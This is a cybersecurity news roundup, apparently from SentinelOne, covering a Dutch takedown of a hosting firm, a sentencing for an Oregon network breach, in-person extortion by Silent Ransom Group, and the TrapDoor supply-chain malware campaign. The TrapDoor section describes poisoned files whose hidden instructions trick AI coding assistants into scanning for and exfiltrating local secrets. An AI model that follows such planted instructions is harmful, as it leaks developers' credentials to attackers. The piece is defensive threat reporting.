The Good | Authorities Dismantle Malicious Hosting Network & Sentence Oregon State Cyberattacker
Web hosting firm, Stark Industries, was the subject of scrutiny this week from financial crime investigators in the Netherlands (FIOD). Founded just before the 2022 invasion of Ukraine, the firm had deep ties to Russian and Belarusian entities all sanctioned by the EU. Dutch authorities arrested two indviduals and seized 800 servers across multiple data centers that actively enabled Russian-based cyberattacks, disinformation operations, and widespread interference campaigns.
After being sanctioned in May of last year, Stark Industries shifted their operations to a front company named WorkTitans B.V., which provided hosting services under a new brand, THE.Hosting. This entity allegedly supported the pro-Russian hacktivist syndicate NoName057(16) in executing distributed denial-of-service (DDoS) attacks and indirectly supplied economic resources to restricted organizations.
Collaboration between the DoJ and Romanian law enforcement has resulted in a Romanian national receiving a sentence of 56 months in federal prison for breaching an Oregon state government network.
Catalin Dragomir, operating under the alias “inthematrixl,” pled guilty to aggravated identity theft and obtaining information from a protected computer. Court documents reveal that the 46-year-old gained unauthorized access to the Oregon Department of Emergency Management in June 2021. He subsequently sold this network access to an outside buyer, providing stolen personally identifiable information.
Beyond the Oregon breach, Dragomir also compromised nearly a dozen other victims across the U.S., with total losses exceeding $250,000. Dragomir currently faces five years for computer intrusion, a mandatory two-year term for identity theft, and three years under supervised release. The court has additionally ordered the forfeiture of his cryptocurrency assets.
The Bad | Silent Ransom Group Attackers Dispatch Operatives for In-Person Data Extortion
In-person data theft schemes are on the rise again. In an urgent flash report, the FBI warns that Silent Ransom Group (SRG) is executing social engineering operations against U.S. legal and financial institutions directly at the site of the victim.
Splitting from the Conti syndicate in early 2022, SRG (aka UNC3753, Luna Moth, and Chatty Spider) has historically relied on targeted callback phishing. Lately, the group has escalated its tactics beyond network compromises to include unauthorized physical access.
The attack chain begins with the threat actors posing as internal IT support personnel. Using typosquatted helpdesk domains, the attackers deploy phishing emails or phone calls urging employees to contact them for technical assistance.
Once an employee engages, the attackers attempt to establish a remote desktop session to exfiltrate data. If remote access fails, SRG deliberately escalates the intrusion by sending an operative directly to the victim’s physical location. These unidentified individuals attempt to gain building access to manually insert USB flash drives or external hard drives into the targeted company computers.
Having obtained information, the extortion gang targets the victimized legal and financial organizations. The attackers send ransom demands threatening to publish the stolen proprietary data on leak sites, while simultaneously harassing both employees and external clients by phone to force financial negotiations.
This recent escalation builds upon previous advisories, making it critical for organizations to train staff on how to thoroughly verify digital helpdesk requests and immediately report threats to physical security.
The Ugly | TrapDoor Campaign Launch Cross-Ecosystem Supply Chain Attacks to Steal Credentials
Security researchers have uncovered TrapDoor, a coordinated software supply chain campaign actively distributing credential-stealing malware across npm, PyPI, and Crates.io.
Starting on May 22, 2026, threat actors deployed over 34 malicious packages spanning nearly 400 versions to specifically target developers within the cryptocurrency, decentralized finance, Solana, and AI communities.
Disguised as legitimate local environment and security tooling, TrapDoor works by harvesting a wide range of sensitive developer secrets, SSH keys, cloud credentials, and cryptocurrency wallets.
The operation uses tailored execution methods for each specific registry. Within npm environments, malicious postinstall hooks deploy a shared JavaScript payload that actively validates stolen AWS and GitHub tokens while attempting SSH-based lateral movement.
Rust crates similarly leverage malicious build scripts to search local keystores, encrypting discovered data with a hardcoded XOR key before exfiltrating it to GitHub Gists.
Meanwhile, the Python packages auto-execute during import to download and run remote JavaScript payloads from attacker-controlled domains, granting the operators significant flexibility to modify the malware’s behavior without publishing new registry releases.
TrapDoor establishes host persistence utilizing cron jobs, systemd services, and Git hooks. The campaign also targets AI coding assistants by implanting compromised files that contain hidden instructions deliberately designed to trick AI tools into autonomously executing malicious security scans that then discover and exfiltrate local secrets.
Researcher say that threat actors are now actively submitting pull requests containing these poisoned files to major open-source AI projects – an evolving tactic to compromise developer workflows through automated contributor processes and code integrations.
Researchers emphasize that this campaign combines traditional package typosquatting with emerging developer-environment attack vectors. By carefully tailoring package names to mimic legitimate cryptocurrency, AI, and local security workflows, the attackers successfully bypass initial developer scrutiny to execute their multi-ecosystem infiltration. A list of compromised packages can be found here.
from SentinelOne https://ift.tt/VnATQma
via IFTTT
